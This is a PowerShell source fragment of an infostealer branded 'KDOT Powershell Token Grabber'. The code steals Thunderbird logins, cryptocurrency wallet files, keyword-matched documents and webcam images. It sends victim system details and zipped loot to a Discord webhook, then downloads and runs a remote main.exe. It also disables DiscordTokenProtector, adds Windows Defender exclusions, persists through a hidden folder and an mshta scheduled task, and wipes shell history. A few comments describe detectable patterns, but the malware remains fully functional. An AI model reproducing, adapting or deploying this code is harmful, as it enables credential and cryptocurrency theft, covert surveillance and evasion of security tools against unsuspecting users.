function Export-Data_Sessions {
telegramstealer
elementstealer
icqstealer
signalstealer
viberstealer
whatsappstealer
steamstealer
minecraftstealer
epicgames_stealer
ubisoftstealer
electronic_arts
growtopiastealer
nordvpnstealer
protonvpnstealer
surfsharkvpnstealer
}
Export-Data_Sessions
# Thunderbird Exfil
If (Test-Path -Path "$env:USERPROFILE\AppData\Roaming\Thunderbird\Profiles") {
$Thunderbird = @('key4.db', 'key3.db', 'logins.json', 'cert9.db')
New-Item -Path "$folder_email\Thunderbird" -ItemType Directory | Out-Null
Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Thunderbird\Profiles" -Include $Thunderbird -Recurse | Copy-Item -Destination "$folder_email\Thunderbird" -Recurse -Force
}
# Cryptocurrency wallet collection (nested in Backup-Data; uses $folder_crypto
# from the enclosing scope). For each supported wallet, tests for its data
# folder (or, for the Qt-based wallets, a registry key), creates a matching
# sub-folder under $folder_crypto and copies the wallet/keystore files into it.
# Defender note: reads of HKCU\software\{Bitcoin,Dash,Litecoin,monero-project}
# followed by wallet.dat / keystore / leveldb copies are the observable pattern.
function Invoke-Crypto_Wallets {
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Armory") {
New-Item -Path "$folder_crypto\Armory" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Armory" -Recurse | Copy-Item -Destination "$folder_crypto\Armory" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Atomic") {
New-Item -Path "$folder_crypto\Atomic" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Atomic\Local Storage\leveldb" -Recurse | Copy-Item -Destination "$folder_crypto\Atomic" -Recurse -Force
}
# Qt wallets: the data directory is taken from the strDataDir registry value.
If (Test-Path -Path "Registry::HKEY_CURRENT_USER\software\Bitcoin") {
New-Item -Path "$folder_crypto\BitcoinCore" -ItemType Directory | Out-Null
Get-ChildItem (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\software\Bitcoin\Bitcoin-Qt" -Name strDataDir).strDataDir -Include *wallet.dat -Recurse | Copy-Item -Destination "$folder_crypto\BitcoinCore" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\bytecoin") {
New-Item -Path "$folder_crypto\bytecoin" -ItemType Directory | Out-Null
# Searches both the bytecoin folder and the whole user profile for *.wallet files.
Get-ChildItem ("$env:userprofile\AppData\Roaming\bytecoin", "$env:userprofile") -Include *.wallet -Recurse | Copy-Item -Destination "$folder_crypto\bytecoin" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Local\Coinomi") {
New-Item -Path "$folder_crypto\Coinomi" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Local\Coinomi\Coinomi\wallets" -Recurse | Copy-Item -Destination "$folder_crypto\Coinomi" -Recurse -Force
}
If (Test-Path -Path "Registry::HKEY_CURRENT_USER\software\Dash") {
New-Item -Path "$folder_crypto\DashCore" -ItemType Directory | Out-Null
Get-ChildItem (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\software\Dash\Dash-Qt" -Name strDataDir).strDataDir -Include *wallet.dat -Recurse | Copy-Item -Destination "$folder_crypto\DashCore" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Electrum") {
New-Item -Path "$folder_crypto\Electrum" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Electrum\wallets" -Recurse | Copy-Item -Destination "$folder_crypto\Electrum" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Ethereum") {
New-Item -Path "$folder_crypto\Ethereum" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Ethereum\keystore" -Recurse | Copy-Item -Destination "$folder_crypto\Ethereum" -Recurse -Force
}
# Note: the guard tests the "Exodus" folder but the copy reads "exodus.wallet".
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Exodus") {
New-Item -Path "$folder_crypto\exodus.wallet" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\exodus.wallet" -Recurse | Copy-Item -Destination "$folder_crypto\exodus.wallet" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Guarda") {
New-Item -Path "$folder_crypto\Guarda" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Guarda\IndexedDB" -Recurse | Copy-Item -Destination "$folder_crypto\Guarda" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\com.liberty.jaxx") {
New-Item -Path "$folder_crypto\liberty.jaxx" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb" -Recurse | Copy-Item -Destination "$folder_crypto\liberty.jaxx" -Recurse -Force
}
If (Test-Path -Path "Registry::HKEY_CURRENT_USER\software\Litecoin") {
New-Item -Path "$folder_crypto\Litecoin" -ItemType Directory | Out-Null
Get-ChildItem (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\software\Litecoin\Litecoin-Qt" -Name strDataDir).strDataDir -Include *wallet.dat -Recurse | Copy-Item -Destination "$folder_crypto\Litecoin" -Recurse -Force
}
If (Test-Path -Path "Registry::HKEY_CURRENT_USER\software\monero-project") {
New-Item -Path "$folder_crypto\Monero" -ItemType Directory | Out-Null
# Monero: the wallet location comes from the wallet_path registry value.
Get-ChildItem (Get-ItemProperty -Path "Registry::HKEY_CURRENT_USER\software\monero-project\monero-core" -Name wallet_path).wallet_path -Recurse | Copy-Item -Destination "$folder_crypto\Monero" -Recurse -Force
}
If (Test-Path -Path "$env:userprofile\AppData\Roaming\Zcash") {
New-Item -Path "$folder_crypto\Zcash" -ItemType Directory | Out-Null
Get-ChildItem "$env:userprofile\AppData\Roaming\Zcash" -Recurse | Copy-Item -Destination "$folder_crypto\Zcash" -Recurse -Force
}
}
Invoke-Crypto_Wallets
$embed_and_body = @{
"username" = "KDOT"
"content" = "@everyone"
"title" = "KDOT"
"description" = "Powerful Token Grabber"
"color" = "3447003"
"avatar_url" = "https://i.postimg.cc/k58gQ03t/PTG.gif"
"url" = "https://discord.gg/vk3rBhcj2y"
"embeds" = @(
@{
"title" = "POWERSHELL GRABBER"
"url" = "https://github.com/ChildrenOfYahweh/Powershell-Token-Grabber/tree/main"
"description" = "New victim info collected !"
"color" = "3447003"
"footer" = @{
"text" = "Made by KDOT, GODFATHER and CHAINSKI"
}
"thumbnail" = @{
"url" = "https://i.postimg.cc/k58gQ03t/PTG.gif"
}
"fields" = @(
@{
"name" = ":satellite: IP"
"value" = "``````$ip``````"
},
@{
"name" = ":bust_in_silhouette: User Information"
"value" = "``````Date: $date `nLanguage: $lang `nUsername: $username `nHostname: $hostname``````"
},
@{
"name" = ":shield: Antivirus"
"value" = "``````$avlist``````"
},
@{
"name" = ":computer: Hardware"
"value" = "``````Screen Size: $screen `nOS: $osversion `nOS Build: $osbuild `nOS Version: $displayversion `nManufacturer: $mfg `nModel: $model `nCPU: $cpu `nGPU: $gpu `nRAM: $raminfo `nHWID: $uuid `nMAC: $mac `nUptime: $uptime``````"
},
@{
"name" = ":floppy_disk: Disk"
"value" = "``````$alldiskinfo``````"
}
@{
"name" = ":signal_strength: WiFi"
"value" = "``````$wifi``````"
}
)
}
)
}
$payload = $embed_and_body | ConvertTo-Json -Depth 10
Invoke-WebRequest -Uri $webhook -Method POST -Body $payload -ContentType "application/json" -UseBasicParsing | Out-Null
# Webcam capture (nested in Backup-Data; uses $folder_general from the
# enclosing scope). Compiles an embedded C# helper that P/Invokes avicap32.dll
# and user32, connects to each video capture driver, copies the current frame
# to the clipboard, reads it back as a bitmap and saves it as
# "$folder_general\out<N>.jpg". Any failure prints "No camera found" and ends
# the whole script via 'exit'.
# Defender note: a PowerShell process compiling a type referencing avicap32.dll
# and then reading the clipboard image is the observable pattern here.
function Get-WebCamImage {
# made by https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1
# C# source passed to Add-Type below. (The here-string is a literal handed to
# the compiler and is left exactly as-is.)
$source=@"
using System;
using System.Collections.Generic;
using System.Text;
using System.Collections;
using System.Runtime.InteropServices;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Windows.Forms;
namespace WebCamLib
{
public class Device
{
private const short WM_CAP = 0x400;
private const int WM_CAP_DRIVER_CONNECT = 0x40a;
private const int WM_CAP_DRIVER_DISCONNECT = 0x40b;
private const int WM_CAP_EDIT_COPY = 0x41e;
private const int WM_CAP_SET_PREVIEW = 0x432;
private const int WM_CAP_SET_OVERLAY = 0x433;
private const int WM_CAP_SET_PREVIEWRATE = 0x434;
private const int WM_CAP_SET_SCALE = 0x435;
private const int WS_CHILD = 0x40000000;
private const int WS_VISIBLE = 0x10000000;
[DllImport("avicap32.dll")]
protected static extern int capCreateCaptureWindowA([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszWindowName,
int dwStyle, int x, int y, int nWidth, int nHeight, int hWndParent, int nID);
[DllImport("user32", EntryPoint = "SendMessageA")]
protected static extern int SendMessage(int hwnd, int wMsg, int wParam, [MarshalAs(UnmanagedType.AsAny)] object lParam);
[DllImport("user32")]
protected static extern int SetWindowPos(int hwnd, int hWndInsertAfter, int x, int y, int cx, int cy, int wFlags);
[DllImport("user32")]
protected static extern bool DestroyWindow(int hwnd);
int index;
int deviceHandle;
public Device(int index)
{
this.index = index;
}
private string _name;
public string Name
{
get { return _name; }
set { _name = value; }
}
private string _version;
public string Version
{
get { return _version; }
set { _version = value; }
}
public override string ToString()
{
return this.Name;
}
public void Init(int windowHeight, int windowWidth, int handle)
{
string deviceIndex = Convert.ToString(this.index);
deviceHandle = capCreateCaptureWindowA(ref deviceIndex, WS_VISIBLE | WS_CHILD, 0, 0, windowWidth, windowHeight, handle, 0);
if (SendMessage(deviceHandle, WM_CAP_DRIVER_CONNECT, this.index, 0) > 0)
{
SendMessage(deviceHandle, WM_CAP_SET_SCALE, -1, 0);
SendMessage(deviceHandle, WM_CAP_SET_PREVIEWRATE, 0x42, 0);
SendMessage(deviceHandle, WM_CAP_SET_PREVIEW, -1, 0);
SetWindowPos(deviceHandle, 1, 0, 0, windowWidth, windowHeight, 6);
}
}
public void ShowWindow(global::System.Windows.Forms.Control windowsControl)
{
Init(windowsControl.Height, windowsControl.Width, windowsControl.Handle.ToInt32());
}
public void CopyC()
{
SendMessage(this.deviceHandle, WM_CAP_EDIT_COPY, 0, 0);
}
public void Stop()
{
SendMessage(deviceHandle, WM_CAP_DRIVER_DISCONNECT, this.index, 0);
DestroyWindow(deviceHandle);
}
}
public class DeviceManager
{
[DllImport("avicap32.dll")]
protected static extern bool capGetDriverDescriptionA(short wDriverIndex,
[MarshalAs(UnmanagedType.VBByRefStr)]ref String lpszName,
int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref String lpszVer, int cbVer);
static ArrayList devices = new ArrayList();
public static Device[] GetAllDevices()
{
String dName = "".PadRight(100);
String dVersion = "".PadRight(100);
for (short i = 0; i < 10; i++)
{
if (capGetDriverDescriptionA(i, ref dName, 100, ref dVersion, 100))
{
Device d = new Device(i);
d.Name = dName.Trim();
d.Version = dVersion.Trim();
devices.Add(d);
}
}
return (Device[])devices.ToArray(typeof(Device));
}
public static Device GetDevice(int deviceIndex)
{
return (Device)devices[deviceIndex];
}
}
}
"@
Add-Type -AssemblyName System.Drawing
# JPEG encoder used when saving each captured frame.
$jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() |
Where-Object { $_.FormatDescription -eq "JPEG" }
Add-Type -TypeDefinition $source -ReferencedAssemblies System.Windows.Forms, System.Data, System.Drawing | Out-Null
try {
#region Import the Assemblies
[reflection.assembly]::loadwithpartialname("System.Windows.Forms") | Out-Null
[reflection.assembly]::loadwithpartialname("System.Drawing") | Out-Null
#endregion
# PictureBox (never added to a form) used as the parent control of the capture window.
$picCapture = New-Object System.Windows.Forms.PictureBox
try {
$devices = [WebCamLib.DeviceManager]::GetAllDevices()
} catch {
Write-Host "No camera found"
# 'exit' ends the whole script, not just this function.
exit
}
$count = 0
foreach ($device in $devices) {
$imagePath = "$folder_general\out$count.jpg"
$device.ShowWindow($picCapture)
# CopyC sends WM_CAP_EDIT_COPY, which places the current frame on the clipboard.
$device.CopyC()
$bitmap = [Windows.Forms.Clipboard]::GetImage()
# NOTE(review): $ep (encoder parameters) is not assigned anywhere in the visible portion of the file.
$bitmap.Save($imagePath, $jpegCodec, $ep)
$bitmap.dispose()
$count++
# Clear the clipboard so the frame is not left behind for the user to see.
[Windows.Forms.Clipboard]::Clear()
}
} catch {
Write-Host "No camera found"
# 'exit' ends the whole script, not just this function.
exit
}
}
try {Get-WebCamImage} catch {}
Function Invoke-GrabFiles {
$grabber = @(
"2fa",
"acc",
"account",
"backup",
"backupcode",
"bitwarden",
"code",
"coinbase",
"crypto",
"dashlane",
"default",
"discord",
"disk",
"eth",
"exodus",
"facebook",
"fb",
"keepass",
"keepassxc",
"keys",
"lastpass",
"login",
"mail",
"memo",
"metamask",
"nordpass",
"pass",
"paypal",
"private",
"pw",
"recovery",
"remote",
"secret",
"seedphrase",
"wallet seed",
"server",
"syncthing",
"token",
"wal",
"wallet"
)
$dest = $important_files
$paths = "$env:userprofile\Downloads", "$env:userprofile\Documents", "$env:userprofile\Desktop"
[regex] $grab_regex = "(" + (($grabber |ForEach-Object {[regex]::escape($_)}) -join "|") + ")"
(Get-ChildItem -path $paths -Include "*.pdf","*.txt","*.doc","*.csv","*.rtf","*.docx" -r | Where-Object Length -lt 5mb) -match $grab_regex | Copy-Item -Destination $dest -Force
}
Invoke-GrabFiles
$items = Get-ChildItem -Path "$folder_general" -Filter out*.jpg
foreach ($item in $items) {
$name = $item.Name
curl.exe -F "payload_json={\`"username\`": \`"KDOT\`", \`"content\`": \`":hamsa: **webcam**\`"}" -F "file=@\`"$folder_general\$name\`"" $webhook | out-null
Remove-Item -Path "$folder_general\$name" -Force
}
Set-Location "$env:LOCALAPPDATA\Temp"
$token_prot = Test-Path "$env:APPDATA\DiscordTokenProtector\DiscordTokenProtector.exe"
if ($token_prot -eq $true) {
Stop-Process -Name DiscordTokenProtector -Force
Remove-Item "$env:APPDATA\DiscordTokenProtector\DiscordTokenProtector.exe" -Force
}
$secure_dat = Test-Path "$env:APPDATA\DiscordTokenProtector\secure.dat"
if ($secure_dat -eq $true) {
Remove-Item "$env:APPDATA\DiscordTokenProtector\secure.dat" -Force
}
try {
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Discord' -Force -ErrorAction SilentlyContinue | Out-Null
} catch {}
(New-Object System.Net.WebClient).DownloadFile("https://github.com/ChildrenOfYahweh/Powershell-Token-Grabber/releases/download/V4.2/main.exe", "$env:LOCALAPPDATA\Temp\main.exe")
Stop-Process -Name "discord" -Force -ErrorAction SilentlyContinue | Out-Null
Stop-Process -Name "discordcanary" -Force -ErrorAction SilentlyContinue | Out-Null
Stop-Process -Name "discordptb" -Force -ErrorAction SilentlyContinue | Out-Null
$proc = Start-Process $env:LOCALAPPDATA\Temp\main.exe -ArgumentList "$webhook" -NoNewWindow -PassThru
$proc.WaitForExit()
$main_temp = "$env:LOCALAPPDATA\Temp"
curl.exe -F "payload_json={\`"username\`": \`"KDOT\`", \`"content\`": \`":hamsa: **Screenshot**\`"}" -F "file=@\`"$main_temp\desktop-screenshot.png\`"" $webhook | out-null
Move-Item "$main_temp\tokens.txt" $folder_general -Force
Move-Item "$main_temp\desktop-screenshot.png" $folder_general -Force
Move-Item -Path "$main_temp\browser-cookies.txt" -Destination "$browser_data" -Force
Move-Item -Path "$main_temp\browser-history.txt" -Destination "$browser_data" -Force
Move-Item -Path "$main_temp\browser-passwords.txt" -Destination "$browser_data" -Force
#remove empty dirs
do {
$dirs = Get-ChildItem $folder_general -directory -recurse | Where-Object { (Get-ChildItem $_.fullName).count -eq 0 } | Select-Object -expandproperty FullName
$dirs | Foreach-Object { Remove-Item $_ }
} while ($dirs.count -gt 0)
Compress-Archive -Path "$folder_general" -DestinationPath "$env:LOCALAPPDATA\Temp\KDOT.zip" -Force
curl.exe -X POST -F 'payload_json={\"username\": \"KDOT\", \"content\": \"\", \"avatar_url\": \"https://i.postimg.cc/k58gQ03t/PTG.gif\"}' -F "file=@$env:LOCALAPPDATA\Temp\KDOT.zip" $webhook
Remove-Item "$env:LOCALAPPDATA\Temp\KDOT.zip" -Force
Remove-Item "$folder_general" -Force -Recurse
Remove-Item "$main_temp\main.exe" -Force
}
function Invoke-TASKS {
Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp"
Add-MpPreference -ExclusionPath "$env:APPDATA\KDOT"
New-Item -ItemType Directory -Path "$env:APPDATA\KDOT" -Force
# Hidden Directory
$KDOT_DIR = get-item "$env:APPDATA\KDOT" -Force
$KDOT_DIR.attributes = "Hidden", "System"
Copy-Item -Path $PSCommandPath -Destination "$env:APPDATA\KDOT\KDOT.ps1" -Force
$task_name = "KDOT"
$task_action = New-ScheduledTaskAction -Execute "mshta.exe" -Argument 'vbscript:createobject("wscript.shell").run("PowerShell.exe -ExecutionPolicy Bypass -File %appdata%\KDOT\KDOT.ps1",0)(window.close)'
$task_trigger = New-ScheduledTaskTrigger -AtLogOn
$task_settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -RunOnlyIfNetworkAvailable -DontStopOnIdleEnd -StartWhenAvailable
Register-ScheduledTask -Action $task_action -Trigger $task_trigger -Settings $task_settings -TaskName $task_name -Description "KDOT" -RunLevel Highest -Force
Backup-Data
}
if (Invoke-Admin_Check -eq $true) {
if (!($debug_mode)) {
Hide-Console
}
try {
Remove-Item (Get-PSreadlineOption).HistorySavePath -Force -ErrorAction SilentlyContinue
} catch {}
Compare-Mutex
# Self-Destruct
# Remove-Item $PSCommandPath -Force
if ($debug_mode) {
Start-Sleep -s 10000
}
} else {
Write-Host ("Please run as admin!") -ForegroundColor Red
Start-Sleep -s 1
Request-Admin
}